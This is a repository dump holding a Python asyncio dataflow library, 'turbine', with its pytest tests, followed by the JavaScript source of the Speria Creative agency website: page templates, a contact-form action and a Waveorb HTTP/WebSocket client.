topology.source("input")(identity)
@topology.scatter("input", ["scatter1", "scatter2"])
def scatter(x):
return x + "!"
@topology.gather(["scatter1", "scatter2"], "output")
def gather(x, y):
return " ".join([x, y])
sinker = []
@topology.sink("output")
def sink(x):
sinker.append(x)
data = ["a", "b", "c"]
topology.run(data)
truth = ["a! a!", "b! b!", "c! c!"]
assert truth == sinker
# @pytest.mark.skip("hangs")
def test_gather_exception(topology):
topology.source("input")(identity)
topology.scatter("input", ["sc1", "sc2"])(identity)
@topology.gather(["sc1", "sc2"], "output")
def fail(x, t):
raise ValueError("Oops")
topology.sink("sc1")(print)
topology.sink("sc2")(print)
data = ["I'm", "going", "to", "fail"]
with pytest.raises(ValueError) as e:
topology.run(data)
print(e)
    assert str(e.value) == "Oops"
def test_select(topology):
topology.source("input")(identity)
@topology.select("input", {0: "evens", 1: "odds"}, lambda x: x % 2)
def selector(x):
return x + 1
even_sinker = []
@topology.sink("evens")
def sink_evens(x):
even_sinker.append(x)
odd_sinker = []
@topology.sink("odds")
def sink_odds(x):
odd_sinker.append(x)
data = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
truth_evens = [2, 4, 6, 8, 10]
truth_odds = [1, 3, 5, 7, 9]
topology.run(data)
assert truth_evens == even_sinker
assert truth_odds == odd_sinker
def test_select_default(topology):
topology.source("input")(identity)
topology.select(
"input",
{"a": "as", "b": "bs"},
lambda x: x[0],
default_outbound_channel="everything_else",
)(identity)
a_sinker = []
@topology.sink("as")
# a_sink ... get it?
def a_sink(a):
a_sinker.append(a)
b_sinker = []
@topology.sink("bs")
def b_sink(b):
b_sinker.append(b)
everything_else_sinker = []
@topology.sink("everything_else")
def everything_else_sink(everything_else):
everything_else_sinker.append(everything_else)
data = ["aaa", "bbb", "ccc", "ddd"]
a_sinker_truth = ["aaa"]
b_sinker_truth = ["bbb"]
everything_else_sinker_truth = ["ccc", "ddd"]
topology.run(data)
assert a_sinker_truth == a_sinker
assert b_sinker_truth == b_sinker
assert everything_else_sinker_truth == everything_else_sinker
@pytest.mark.skip("hangs")
def test_select_no_default(topology):
topology.source("input")(identity)
topology.select("input", {"a": "as", "b": "bs"}, lambda x: x[0],)(identity)
a_sinker = []
@topology.sink("as")
# a_sink ... get it?
def a_sink(a):
a_sinker.append(a)
b_sinker = []
@topology.sink("bs", num_tasks=1)
def b_sink(b):
b_sinker.append(b)
data = ["aaa", "bbb", "ccc", "ddd"]
with pytest.raises(ValueError):
topology.run(data)
<file_sep>from .turbine import Turbine
__all__ = ["Turbine"]
<file_sep>import pytest
from turbine.asyncio import Turbine
@pytest.fixture()
def topology():
return Turbine(debug=True)
def test_source_sink_single_task(topology):
topology.source("input")()
sinker = []
@topology.sink("input")
def sink_array(x):
sinker.append(x)
data = ["a", "b", "c"]
topology.run(data)
assert data == sinker
def test_source_sink_multi_task(topology):
topology.source("input")()
sinker = []
@topology.sink("input", num_tasks=3)
def sink_array(x):
sinker.append(x)
data = ["a", "b", "c", "d", "e"]
topology.run(data)
assert set(data) == set(sinker)
def test_source_sink_source_exception(topology):
@topology.source("input")
def fail(x):
raise ValueError("uh oh")
sinker = []
@topology.sink("input", num_tasks=3)
def sink(x):
sinker.append(x)
data = ["a", "b", "c", "d", "e"]
with pytest.raises(ValueError) as e:
topology.run(data)
assert "uh oh" == str(e.value)
def test_source_sink_sink_exception(topology):
topology.source("input")()
@topology.sink("input", num_tasks=3)
def sink(x):
raise ValueError("failure")
data = ["a", "b", "c", "d", "e"]
with pytest.raises(ValueError) as e:
topology.run(data)
assert "failure" == str(e.value)
<file_sep>from setuptools import setup, find_packages
setup(
name="turbine",
version="0.1.alpha1",
packages=find_packages(exclude=["tests", "scripts"]),
install_requires=[],
author="<NAME>",
)
<file_sep># Under Construction
Just experimenting for now.<file_sep>from turbine import Turbine
topology = Turbine(debug=True)
@topology.source("input")
def add_exclamation(input_str):
return input_str + "!"
@topology.scatter("input", ["output_1", "output_2"], num_tasks=1)
def moar_exclamations(input_str):
return input_str + "!!"
@topology.sink("output_1")
def print_val(val):
print(val)
@topology.sink("output_2", num_tasks=2)
def print_val2(val):
print(val.upper())
values = ["hello", "world"]
topology.run(values)
<file_sep>import logging
import asyncio
from asyncio import (
Queue,
create_task,
run as async_run,
gather as gather_tasks,
Task,
)
from typing import (
Callable,
List,
Iterable,
Dict,
Any,
Tuple,
TypeVar,
Type,
Union,
)
from itertools import repeat
logging.basicConfig(
format="%(asctime)s | %(levelname)s | %(name)s | "
"%(funcName)s | %(message)s"
)
logger = logging.getLogger("turbine")
# TODO Figure out how to implement union
# TODO Look into changing queue sizes to match num_tasks.
# TODO Implement select
# TODO Implement splatter
# TODO Implement spread
# TODO Implement collect
# TODO Docstring source
# TODO Docstring scatter
# TODO Docstring union
# TODO Docstring gather
# TODO Docstring select
# TODO Docstring splatter
# TODO Docstring spread
# TODO Docstring collect
# TODO Docstring sink
# TODO Test select
# TODO Test splatter
# TODO Test spread
# TODO Test collect
T = TypeVar("T")
class Stop:
pass
class Fail(Stop):
def __init__(self, exc: Type[Exception], msg: str):
self.exc = exc
self.msg = msg
def raise_exc(self):
raise self.exc(self.msg)
class Turbine:
def __init__(self, debug=False):
# Channel names gets added to as decorators are called.
self._channel_names: Dict[str, int] = {}
# Track the number of tasks associated with each channel so we know
# how many stops to send downstream. Otherwise, we'll block forever.
# Trust me. Trust. Me.
self._channel_num_tasks: Dict[str, int] = {}
# Map the channel aliases to a channel. This gets filled inside the
# event loop.
self._channels: Dict[str, asyncio.Queue] = {}
# This is how the topology gets loaded.
self._entry_point: Callable = None
self._tasks: List[Callable] = []
self._running_tasks: List[Task] = []
if debug:
logger.setLevel("DEBUG")
logger.debug("Logger set to debug.")
self._topology_running = None
async def _fail_topology(
self, fail_exc: Type[Exception], fail_msg: str
    ) -> Fail:
fail = Fail(fail_exc, fail_msg)
self._clear_queues()
self._topology_running = False
await self._send_stop(list(self._channels.keys()), fail)
return fail
async def _send_stop(
self, outbound_channels: List[str], stopper: Stop
) -> None:
for c in outbound_channels:
num_tasks = self._channel_num_tasks[c]
for _ in range(num_tasks):
# Only send a downstream stop if there's something to process
# it.
if self._channel_num_tasks[c] > 0:
logger.debug(f"Sending stop to {c}: {stopper}.")
await self._channels[c].put(stopper)
self._channel_num_tasks[c] -= 1
async def _stop_tasks(self) -> None:
logger.debug("Stopping tasks.")
logger.debug(f"Queue statuses: {self._queue_statuses()}.")
logger.debug(f"Task statuses - {self._task_statuses()}.")
tasks_done = await gather_tasks(
*self._running_tasks, return_exceptions=True
)
for t in tasks_done:
if isinstance(t, Fail):
t.raise_exc()
def _queue_statuses(self) -> str:
queue_statuses = [
f"{c}: {q._unfinished_tasks}/{q.qsize()}" # type: ignore
for c, q in self._channels.items()
]
return " | ".join(queue_statuses)
def _task_statuses(self) -> str:
task_statuses = [
f"{c}: {n}" for c, n in self._channel_num_tasks.items()
]
return " | ".join(task_statuses)
def _clear_queues(self) -> None:
for q in self._channels.values():
# So this is ... questionable. Have to ignore the type to get it
# to pass the checker because we shouldn't be reaching in for this.
# There is no other way to clear a queue.
q._queue.clear() # type: ignore
q._unfinished_tasks = 0 # type: ignore
logger.debug("Queues allegedly cleared.")
logger.debug(f"Queue statuses: {self._queue_statuses()}.")
logger.debug(f"Task statuses - {self._task_statuses()}.")
def _add_channels(self, channels: Iterable[Tuple[str, int]]) -> None:
for name, size in channels:
# This condition will apply to the entry point, which is set in the
# source function because that queue needs to be unbounded.
if name not in self._channel_names:
self._channel_names[name] = size
async def _source(
self, outbound_name: str, f: Callable, *args, **kwargs
) -> None:
if len(args) > 1 or not isinstance(args[0], Stop):
value = f(*args, **kwargs)
await self._channels[outbound_name].put(value)
else:
value = args[0]
logger.debug(f"Source received stop: {value}.")
logger.debug(f"Queue statuses - {self._queue_statuses()}.")
logger.debug(f"Task statuses - {self._task_statuses()}.")
await self._send_stop([outbound_name], value)
def source(self, outbound_name: str) -> Callable:
# Now do the real decorator.
def decorator(f: Callable) -> Callable:
async def entry_point(*args, **kwargs):
try:
await self._source(outbound_name, f, *args, **kwargs)
except Exception as e:
logger.exception(f"Source got exception {e}.")
await self._fail_topology(type(e), str(e))
# The entry point will get called with Turbine.run. We need this
# separate from other tasks because it's not an infinite loop.
# That's really the only difference between this decorator and the
# others ... no while True.
self._entry_point = entry_point
return f
return decorator
async def _scatter(
self, inbound_channel: str, outbound_channels: List[str], f: Callable,
) -> Stop:
while True:
input_value = await self._channels[inbound_channel].get()
if isinstance(input_value, Stop):
logger.debug(f"Scatter received stop: {input_value}.")
logger.debug(f"Queue statuses - {self._queue_statuses()}.")
logger.debug(f"Task statuses - {self._task_statuses()}.")
await self._send_stop(outbound_channels, input_value)
self._channels[inbound_channel].task_done()
return input_value
# Call the function on the inputs ...
output = f(input_value)
# ... and copy the outputs to each of the outbound channels.
for output, channel in zip(repeat(output), outbound_channels):
await self._channels[channel].put(output)
self._channels[inbound_channel].task_done()
def scatter(
self,
inbound_channel: str,
outbound_channels: List[str],
num_tasks: int = 1,
) -> Callable:
# Add the inbound channels to the channel map.
self._add_channels([(inbound_channel, 1)])
self._channel_num_tasks[inbound_channel] = num_tasks
def decorator(f: Callable) -> Callable:
# Create the async task that applies the function.
async def task() -> Stop:
try:
return await self._scatter(
inbound_channel, outbound_channels, f
)
except Exception as e:
logger.exception(f"Scatter got exception {e}.")
fail = Fail(type(e), str(e))
self._channel_num_tasks[inbound_channel] -= 1
logger.debug(f"Task statuses - {self._task_statuses()}.")
return await self._fail_topology(type(e), str(e))
# We need to restart the function so the topology is
# repaired. This ensures the failure is appropriately
# propagated.
# return await self._scatter(
# inbound_channel, outbound_channels, f
# )
# Create all of the tasks.
for _ in range(num_tasks):
self._tasks.append(task)
return f
return decorator
def union(self):
pass # ! This is a tough one. In Clojure I used alts!!.
async def _gather(
self, inbound_channels: List[str], outbound_channel: str, f: Callable
) -> Stop:
while True:
values = []
stop: Union[Stop, None] = None
# Read off the inbound channels sequentially.
for c in inbound_channels:
v = await self._channels[c].get()
if not isinstance(v, Stop):
values.append(v)
else:
stop = v
break # Stop means stop.
# Determine if a stop came from any of the inbound channels and
# send the stop message along.
if stop:
logger.debug(f"Gather received stop: {stop}.")
logger.debug(f"Queue statuses - {self._queue_statuses()}.")
logger.debug(f"Task statuses - {self._task_statuses()}.")
await self._send_stop([outbound_channel], stop)
for c in inbound_channels:
self._channels[c].task_done()
return stop
# If we don't stop, apply the function and send the result
# downstream.
output = f(*values)
await self._channels[outbound_channel].put(output)
for c in inbound_channels:
self._channels[c].task_done()
def gather(
self,
inbound_channels: List[str],
outbound_channel: str,
num_tasks: int = 1,
) -> Callable:
self._add_channels(zip(inbound_channels, repeat(1)))
for inbound_name in inbound_channels:
self._channel_num_tasks[inbound_name] = num_tasks
def decorator(f: Callable) -> Callable:
# Create the async task that applies the function.
async def task():
try:
return await self._gather(
inbound_channels, outbound_channel, f
)
except Exception as e:
logger.exception(f"Gather got an exception: {e}.")
fail = Fail(type(e), str(e))
for inbound_channel in inbound_channels:
self._channel_num_tasks[inbound_channel] -= 1
logger.debug(f"Task statuses - {self._task_statuses()}.")
return await self._fail_topology(type(e), str(e))
# Create the tasks.
for _ in range(num_tasks):
self._tasks.append(task)
return f
return decorator
def select(
self,
inbound_channel: str,
outbound_channels: Dict[T, str],
selector_fn: Callable[[Any], T],
default_outbound_channel: str = None,
num_tasks: int = 1,
) -> Callable:
def decorator(f: Callable) -> Callable:
all_outbound_channels = list(outbound_channels.values())
if default_outbound_channel:
all_outbound_channels.append(default_outbound_channel)
self._add_channels([(inbound_channel, 1)])
self._channel_num_tasks[inbound_channel] = num_tasks
# Create the async task that executes the function.
async def task():
while True:
value = await self._channels[inbound_channel].get()
if isinstance(value, Stop):
logger.debug(f"Selector got a stop {value}.")
for c in all_outbound_channels:
await self._channels[c].put(value)
self._channels[inbound_channel].task_done()
return value
output = f(value)
selector_value = selector_fn(output)
if (
selector_value not in outbound_channels
and default_outbound_channel
):
# selector value is not in the outbound channel map,
# put on default.
await self._channels[default_outbound_channel].put(
output
)
elif selector_value not in outbound_channels:
# selector value is not in the outbound channel map and
# there isn't a default outbound channel.
fail = Fail(
ValueError,
f"No selector value for {selector_value}.",
)
self._clear_queues()
await self._entry_point(fail)
else:
# selector value is in the outbound channel map, put
# the value on that channel.
await self._channels[
outbound_channels[selector_value]
].put(output)
self._channels[inbound_channel].task_done()
for _ in range(num_tasks):
self._tasks.append(task)
return f
return decorator
def splatter(self):
pass
def spread(self):
pass
def task(self):
# This is a one-in one-out route.
# It's for parallelizing workloads.
pass
def collect(self):
pass
def sink(self, inbound_name: str, num_tasks: int = 1) -> Callable:
self._channel_num_tasks[inbound_name] = num_tasks
self._add_channels([(inbound_name, 1)])
def decorator(f: Callable) -> Callable:
async def task():
while True:
value = await self._channels[inbound_name].get()
if isinstance(value, Stop):
logger.debug(f"Sinker received stop: {value}.")
self._channels[inbound_name].task_done()
self._channel_num_tasks[inbound_name] -= 1
logger.debug(
f"Queue statuses - {self._queue_statuses()}."
)
logger.debug(
f"Task statuses - {self._task_statuses()}."
)
return value
f(value)
self._channels[inbound_name].task_done()
# Create the tasks for the sinks.
for _ in range(num_tasks):
self._tasks.append(task)
return f
return decorator
async def _run_tasks(self, seq: Iterable) -> None:
# Create the queues inside the event loop attached to `run`.
self._channels = {
c: Queue(maxsize=s) for c, s in self._channel_names.items()
}
# Load the tasks into the loop.
self._running_tasks = [create_task(t()) for t in self._tasks]
self._topology_running = True
# Load the entry point queue.
for s in seq:
if self._topology_running:
await self._entry_point(s)
if self._topology_running:
await self._entry_point(Stop())
logger.debug(f"Queue statuses: {self._queue_statuses()}.")
# Now shut the tasks down.
await self._stop_tasks()
def run(self, seq: Iterable) -> None:
queue_sizes = " | ".join(
[f"{q}: {n}" for q, n in self._channel_names.items()]
)
num_tasks = " | ".join(
[f"{q}: {n}" for q, n in self._channel_num_tasks.items()]
)
logger.debug(f"Queue sizes: {queue_sizes}.")
logger.debug(f"Task concurrencies: {num_tasks}.")
async_run(self._run_tasks(seq), debug=True)
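# --- Hedged sketch (not part of the module above) ---
# _clear_queues() above reaches into asyncio.Queue internals (q._queue,
# q._unfinished_tasks), which its own comments flag as questionable. One
# public-API alternative is to drain each queue with get_nowait()/task_done()
# until QueueEmpty. The helper name drain_queue is an illustrative assumption;
# note it only removes items still sitting in the queue, it does not reset
# bookkeeping for items already taken by a worker.
import asyncio

def drain_queue(q: asyncio.Queue) -> int:
    """Remove every pending item from q using only public Queue methods; return the count."""
    drained = 0
    while True:
        try:
            q.get_nowait()
        except asyncio.QueueEmpty:
            return drained
        q.task_done()  # keep join() bookkeeping consistent for each removed item
        drained += 1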
| c55aa158f87965cf4806e7acc31fec030dfc5bc3 | ["Markdown", "Python"] | 8 | Python | timothyrenner/turbine-py | b0af24022e53832b7c001d7e9ef4aa04a7a4ef88 | c57b0ec3611f74756885eb55e7ece8119e434ccd | refs/heads/master |
<repo_name>suspha/speria-creative<file_sep>/app/layouts/default.js
module.exports = async function ($) {
const host =
process.env.NODE_ENV == 'production'
? 'https://speria.no/api'
: 'http://localhost:5000'
function init() {
var links = document.querySelectorAll('a.langlink')
links.forEach(function (a) {
if (a.pathname == location.pathname) {
a.classList.add('active-link')
}
})
}
return /* html */ `
<!doctype html>
<html lang="${$.lang}">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="msvalidate.01" content="4ABA947BA0D78F4F16C67C0B46BB917E">
<meta name="description" content="Profesjonell Webdesign og webutvikling, SEO Søkemotoroptimalisering og Markedsføring, billig og rimelig Hosting og Drift">
<title>${$.page.title || 'Speria Creative'}</title>
${$.style('/bundle.css')}
<link href="/img/favicon.png" rel="shortcut icon">
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Raleway:wght@300;400;500&display=swap" rel="stylesheet">
${$.script('/bundle.js')}
<script>window.api = waveorb('${host}')</script>
<script async defer data-domain="speria.no" src="https://plausible.io/js/plausible.js"></script>
<script defer data-domain="speria.no" src="https://tactility.no/js/tactility.js"></script>
</head>
<body>
<div class="top-nav">
<div class="speria-logo">
<a href="${$.link('index')}">
<img class="speria-logo" src="/img/speria-logo.svg" alt="logo">
</a>
</div>
<nav id="navi-mob">
<a href="#" aria-label="menu" onclick="toggleMenu(this); return false"><i class="kube-menu active"></i></a>
<ul id="menu">
<li><a href="${$.link('index')}">${$.t('nav1')}</a></li>
<li><a href="${$.link('design-utvikling')}">${$.t(
'nav_tjenester1'
)}</a></li>
<li><a href="${$.link('seo-marketing')}">${$.t(
'nav_tjenester2'
)}</a></li>
<li><a href="${$.link('hosting-drift')}">${$.t(
'nav_tjenester3'
)}</a></li>
<li><a href="${$.link('om-oss')}">${$.t('nav3')}</a></li>
<li><a href="${$.link('index')}#prosjekter">${$.t(
'nav4'
)}</a></li>
<li><a href="${$.link('index')}#kontakt">${$.t('nav5')}</a></li>
</ul>
</nav>
<script>
function toggleMenu(a) {
var menu = $('#menu'), timer = 500, icon = a.querySelector('i');
$(icon).toggleClass('active');
// Toggle menu
if(menu.is(':visible')) {
menu.animate({ right: '-200px', opacity: 0} , timer, function(){
$(this).hide();
});
} else {
menu.show();
menu.animate({ right: '0', opacity: 0.95} , timer);
}
}
</script>
<div class="lang-switch">
<a class="langlink" href="${$.link(
`en@${$.<EMAIL>}`
)}" onclick="window.cookie('lang', 'en')">EN</a>
<span class="split">/</span>
<a class="langlink" href="${$.link(
`<EMAIL>}`
)}" onclick="window.cookie('lang', 'no')">NO</a>
</div>
<nav class="tabs" id="navi">
<ul>
<li>
<a href="${$.link('index')}">${$.t('nav1')} |</a>
</li>
<li>
<a href="" data-component="dropdown" data-target="#dropdown-fixed">
${$.t('nav2')}
<span class="caret down"> |</span>
</a>
</li>
<li>
<a href="${$.link('om-oss')}">${$.t('nav3')} |</a>
</li>
<li><a id="prosjekt-link" href="${$.link(
'index'
)}#prosjekter">${$.t('nav4')} |</a></li>
<li><a id="kontakt-link" href="${$.link('index')}#kontakt">${$.t(
'nav5'
)}</a></li>
</ul>
</nav>
<script>${init}; init();</script>
<div class="dropdown hide" id="dropdown-fixed">
<ul>
<li><a href="${$.link('design-utvikling')}">${$.t(
'nav_tjenester1'
)}</a></li>
<li><a href="${$.link('seo-marketing')}">${$.t(
'nav_tjenester2'
)}</a></li>
<li><a href="${$.link('hosting-drift')}">${$.t(
'nav_tjenester3'
)}</a></li>
</ul>
</div>
</div>
${$.page.content}
<footer>
<p>2022 Design and code by Speria Creative</p>
</footer>
<script>cookie('lang', '${$.lang}')</script>
</body>
</html>
`
}
<file_sep>/app/pages/om-oss.js
module.exports = async function($) {
$.page.description = $.t('om-oss_meta')
$.page.title = $.t('om-oss_title')
return /* html */`
<div class="top-wrapper pale-background">
<div class="top-row">
<div class="top-column image">
<div class="top-image">
<img src="/img/speria-creative-about-opt.svg" alt="image">
</div>
</div>
<div class="top-column text">
<div class="top-text">
<h1>${ $.t('om_oss_tittel') }</h1><hr style="width:12%; position: relative; left: -2rem">
<p>“ ${ $.t('om_oss_undertittel_bilde') } ”</p>
</div>
</div>
</div>
</div>
<div class="full-width border-row light-background">
<div class="intro-om-oss inner-width">
      <h2>We don't work to live - We live to work</h2>
<p>${ $.t('om_oss_tekst1') }</p>
<p>${ $.t('om_oss_tekst2') }</p>
<p>${ $.t('om_oss_tekst3') }</p>
<h3>${ $.t('om_oss_tittel1') }</h3>
<blockquote>${ $.t('om_oss_tekst4') }</blockquote>
<blockquote>${ $.t('om_oss_tekst5') }</blockquote>
<blockquote>${ $.t('om_oss_tekst6') }</blockquote>
<blockquote>${ $.t('om_oss_tekst7') }</blockquote>
<blockquote>${ $.t('om_oss_tekst8') }</blockquote>
<blockquote>${ $.t('om_oss_tekst9') }</blockquote>
<a class="button small" href="${ $.link('index') }#kontakt"> ${ $.t('om_oss_tekst10') }</a>
</div>
</div>
`
}
<file_sep>/app/components/projects.js
module.exports = async function($) {
return /* html */`
<div class="full-width border-row light-background">
<div class="inner-width-wide">
<div class="portfolio">
<h2 id="prosjekter">${ $.t('index_prosjekter') }</h2>
<hr style="width:5%; margin-top: -12px; margin-left: 3em;">
</div>
</div>
<div class="fade">
<figure>
<div class="slideshow-container">
<div class="mySlides fade">
<img src="/img/asylet.png" alt="portfolie_asylet">
<div class="text-slider"><h4><a href="https://asylet.no" target="_blank" rel="noopener">Kafé Asylet</a></h4></div>
</div>
<div class="mySlides fade">
<img src="/img/vdb-autoshine.png" alt="portfolie_VDB Autoshine">
<div class="text-slider"><h4><a href=" https://vdbautoshine.no" target="_blank" rel="noopener">VDB Autoshine nettbutikk</a></h4></div>
</div>
<div class="mySlides fade">
<img src="/img/tabibito.jpg" alt="portfolie_tabibito">
<div class="text-slider"><h4><a href="http://tabibito.no" target="_blank" rel="noopener">Tabibito Asian Fusion Restaurant</a></h4></div>
</div>
<div class="mySlides fade">
<img src="/img/crowdfundhq.jpeg" alt="portfolie_crowdfundhq">
<div class="text-slider"><h4><a href="https://crowdfundhq.com" target="_blank" rel="noopener">CrowdfundHQ - Create your own site</a></h4></div>
</div>
<div class="mySlides fade">
<img src="/img/waveorb.jpeg" alt="portfolie_waveorb">
<div class="text-slider"><h4><a href="https://waveorb.com" target="_blank" rel="noopener">Waveorb - Personal, marketing and support emails</a></h4></div>
</div>
<a class="prev" onclick="plusSlides(-1)">❮</a>
<a class="next" onclick="plusSlides(1)">❯</a>
</div>
</figure>
</div>
</div>
<div class="go-top">
<a id="arrow-up" href="javascript:void(0)"><img src="/img/arrow-up.svg" alt="arrow_up" title="Scroll to the top"></a>
</div>
<script>
var index = 0, tick = 5000, timer, i
, slides = document.getElementsByClassName('mySlides');
document.addEventListener('DOMContentLoaded', function(){
for(i = 0; i < slides.length; i++) {
slides[i].addEventListener('mouseenter', function(event){
var t = event.srcElement.querySelector('.text-slider');
$(t).fadeIn();
clearTimeout(timer);
});
slides[i].addEventListener('mouseleave', function(event){
var t = event.srcElement.querySelector('.text-slider');
$(t).fadeOut();
restartTimer();
});
}
});
function restartTimer() {
clearTimeout(timer);
timer = setTimeout(carousel, tick);
}
function plusSlides(n) {
showSlides(index += n);
}
function currentSlide(n) {
showSlides(index = n);
}
function carousel() {
showSlides(index += 1);
}
function showSlides(n) {
if (n > slides.length){ index = 1;}
if (n < 1){ index = slides.length;}
for (i = 0; i < slides.length; i++) {
slides[i].style.display = 'none';
}
slides[index-1].style.display = 'block';
restartTimer();
}
carousel();
</script>
`
}
<file_sep>/app/components/about.js
module.exports = async function($) {
return /* html */ `
<div class="full-width border-row light-background">
<div class="about-us inner-width-wide">
<div class="row gutters">
<div class="col col-6 about-us-intro">
<h2>${ $.t('index_om_oss_tittel') }</h2>
<hr style="width:6%; margin-top: -12px; padding-bottom: 1rem;">
<p>${ $.t('index_om_oss1') }</p>
<p>${ $.t('index_om_oss2') }</p>
<a href="${ $.link('om-oss') }">${ $.t('index_les_mer') }</a>
</div>
<div class="col col-6 about-us-image">
<img src="/img/screen_demo.jpeg" alt="image">
</div>
</div>
</div>
</div>
`
}<file_sep>/app/actions/contact/create.js
module.exports = {
validate: {
values: {
name: {
minlength: 2
},
email: {
is: '$email'
},
subject: {
in: ['price', 'questions', 'marketing', 'design', 'hosting', 'other']
},
message: {
minlength: 5
}
}
},
main: async function($) {
// Gather parameters sent from the client
const { name, phone, email, subject, message } = $.params.values
const data = { name, email, phone, message }
const options = { subject, from: email }
// Send the email and return the result
return await $.app.mailer.send('contact', $, options, data)
}
}
<file_sep>/app/assets/js/waveorb.js
(function() {
var socket = async function(url, options) {
// Connection ready states for web socket
var CONNECTING = 0
var OPEN = 1
var CLOSING = 2
var CLOSED = 3
// Connection close codes
var CLOSE_NORMAL = 1000
var CLOSE_AWAY = 1001
// Callback identifier
var CBID = '$cbid'
// Options
if (!options) options = {}
if (typeof options.reconnect === 'undefined' || options.reconnect === true) options.reconnect = 1000
if (options.ping === true) options.ping = 1000
if (typeof options.disconnect === 'undefined') options.disconnect = 3000
// Variables
var socket, callbacks, cid, interval, timeout, events = {}
// Events
var EVENTS = ['message', 'open', 'close', 'error']
for (var i = 0; i < EVENTS.length; i++) {
events[EVENTS[i]] = []
}
// Register events
function on(name, fn) {
events[name].push(fn)
}
function run(name, ...args) {
for (var i = 0; i < events[name].length; i++) {
events[name][i](...args)
}
}
function connect(resolve, reject) {
callbacks = {}
cid = 0
socket = new WebSocket(url)
socket.onmessage = function(event) {
var data = JSON.parse(event.data)
var id = data[CBID]
if (id) {
delete data[CBID]
if (callbacks[id]) {
callbacks[id](data, event)
delete callbacks[id]
}
} else {
run('message', data, event)
}
}
socket.onopen = function(event) {
if (resolve) resolve(api)
run('open', api, event)
ping()
}
socket.onerror = function(event) {
if (reject) reject(event)
run('error', event)
}
socket.onclose = function(event) {
if (options.reconnect) {
setTimeout(connect, options.reconnect)
}
run('close', event)
}
}
function disconnect(code) {
code = code || CLOSE_NORMAL
socket.close(code)
}
function ping() {
if (options.ping) {
clearInterval(interval)
clearTimeout(timeout)
interval = setInterval(function() {
send({
$ping: 1
})
}, options.ping)
timeout = setTimeout(function() {
clearInterval(interval)
disconnect(CLOSE_AWAY)
}, options.disconnect)
}
}
function send(params) {
if (socket.readyState === OPEN) {
socket.send(JSON.stringify(params))
}
}
function fetch(params) {
return new Promise(function(resolve) {
params[CBID] = ++cid
callbacks[cid] = function(data) {
resolve(data)
}
send(params)
})
}
var api = {
on,
connect,
send,
fetch,
disconnect
}
return new Promise(connect)
};
var http = function(url, params, options) {
return new Promise(function(resolve, reject) {
if (!options) options = {}
if (!params) params = {}
var xhr = new XMLHttpRequest()
xhr.addEventListener('load', function() {
var json = JSON.parse(xhr.responseText)
resolve(json)
})
xhr.addEventListener('error', function() {
reject(xhr)
})
xhr.open(options.method || 'POST', url + (options.path || ''))
// Set up upload if we have files
var data
if (options.files) {
data = new FormData()
// Add params to data
for (var key in params) {
data.append(key, JSON.stringify(params[key]))
}
// Loop through each of the selected files
for (var file of options.files) {
data.append('file', file, file.name)
}
if (options.progress) {
xhr.upload.addEventListener('progress', function(event) {
event.percent = (event.loaded / event.total * 100).toFixed(2)
options.progress(event)
})
}
} else {
xhr.setRequestHeader('Content-Type', 'application/json; charset=utf-8')
}
if (options.headers) {
for (var key in options.headers) {
xhr.setRequestHeader(key, options.headers[key])
}
}
// Send data to server
xhr.withCredentials = true
xhr.send(data || JSON.stringify(params))
})
};
  window.waveorb = function(url, config = {}) {
    // indexOf returns 0 when the URL starts with 'ws', so this branch handles WebSocket URLs
    if (!url.indexOf('ws')) {
return new Promise(function(resolve) {
socket(url, config).then(function(s) {
return resolve(s.fetch)
})
})
}
return function(data = {}, options = {}) {
return http(url, data, options)
}
}
}())
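// --- Hedged usage sketch (not part of waveorb.js above) ---
// Based on the code above: for an http(s) URL, waveorb(url) returns a function that
// POSTs JSON params (this is how app/layouts/default.js wires window.api, and how
// app/components/contact.js calls it); for a ws:// or wss:// URL it returns a Promise
// that resolves to a socket-backed fetch. The 'https://example.test/api' endpoint is a
// placeholder, not a real server.
(async function() {
  // HTTP mode
  var api = waveorb('https://example.test/api')
  var result = await api({ action: 'contact/create', values: { name: 'Ada' } })
  console.log(result)

  // WebSocket mode: awaiting waveorb() yields the socket's fetch function directly.
  // var wsFetch = await waveorb('wss://example.test/api')
  // var data = await wsFetch({ action: 'contact/create', values: { name: 'Ada' } })
}())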
<file_sep>/README.md
# speria-creative
<file_sep>/app/pages/hosting-drift.js
module.exports = async function($) {
$.page.description = $.t('host_meta')
$.page.title = $.t('host_title')
return /* html */`
<div class="top-wrapper pale-background">
<div class="top-row">
<div class="top-column image">
<div class="top-image">
<img src="/img/speria-creative-hosting-support-opt.svg" alt="image">
</div>
</div>
<div class="top-column text">
<div class="top-text">
<h1>${ $.t('hosting_tittel') }</h1><hr style="width:14%; position: relative; left: 2rem">
<p>“ ${ $.t('hosting_undertittel_bilde') } ”</p>
</div>
</div>
</div>
</div>
<div class="full-width border-row light-background">
<div class="intro-hosting inner-width">
<h2>${ $.t('hosting_tekst_bilde') }</h2>
<p>${ $.t('hosting_tekst1') }</p>
<h3>${ $.t('hosting_tittel1') }</h3>
<p>${ $.t('hosting_tekst2') }</p>
<h3>${ $.t('hosting_tittel2') }</h3>
<p>${ $.t('hosting_tekst3') }</p><br>
<p>${ $.t('hosting_tekst4') }</p><br>
<a href="${ $.link('index') }?subject=hosting#kontakt" class="button small" role="button">${ $.t('hosting_tekst5') }</a>
</div>
</div>
`
}
<file_sep>/app/assets/js/app.js
document.addEventListener('DOMContentLoaded', function(){
$('#prosjekt-link').click(function(){
$('html, body').animate({
scrollTop: $('#prosjekter').offset().top
}, 1500);
});
$('#kontakt-link').click(function(){
$('html, body').animate({
scrollTop: $('#kontakt').offset().top
}, 1500);
});
$('#arrow-up').click(function(){
$('html, body').animate({
scrollTop: $('#navi').offset().top
}, 1500);
});
});
<file_sep>/app/pages/index.js
const contact = require('../components/contact.js')
const projects = require('../components/projects.js')
const services = require('../components/services.js')
const about = require('../components/about.js')
module.exports = async function($) {
$.page.description = $.t('index_meta')
$.page.title = $.t('index_title')
return /* html */`
<div class="top-wrapper pale-background">
<div class="top-row">
<div class="top-column image">
<div class="top-image frontpage">
<img src="/img/speria-creative-main-opt.svg" alt="image">
</div>
</div>
<div class="top-column text">
<div class="top-text main">
<h1>Speria Creative</h1>
<hr style="width:14%;">
<p>“ ${ $.t('index_undertittel_bilde') } ”</p>
<hr style="width:10%;margin-left:-28%">
</div>
</div>
</div>
</div>
${ await about($) }
${ await services($) }
${ await projects($) }
${ await contact($) }
`
}
